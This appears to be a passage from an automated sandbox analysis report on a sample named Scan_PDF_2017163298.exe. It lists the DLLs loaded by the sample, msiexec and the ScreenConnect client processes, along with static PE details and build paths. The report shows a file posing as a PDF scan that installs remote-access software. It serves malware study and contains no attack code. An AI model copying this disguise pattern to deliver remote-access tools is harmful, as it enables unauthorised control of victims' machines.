                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "be73d786-925b-47a5-99df-a44cdbf0e1aa" "System"Jump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: Scan_PDF_2017163298.exeStatic PE information: certificate valid
                              Source: Scan_PDF_2017163298.exeStatic file information: File size 5685048 > 1048576
                              Source: Scan_PDF_2017163298.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                              Source: Scan_PDF_2017163298.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: Scan_PDF_2017163298.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: Scan_PDF_2017163298.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: Scan_PDF_2017163298.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Scan_PDF_2017163298.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: Scan_PDF_2017163298.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: Scan_PDF_2017163298.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Scan_PDF_2017163298.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1452336633.0000000002992000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1401154593.00000000001A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: Scan_PDF_2017163298.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: Scan_PDF_2017163298.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: Scan_PDF_2017163298.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                              Source: Binary string: ttResolver.pdb source: Scan_PDF_2017163298.exe, 00000000.00000002.1345833223.00000000015F4000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2602218756.0000000002A67000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1459208723.0000000012B30000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: Scan_PDF_2017163298.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
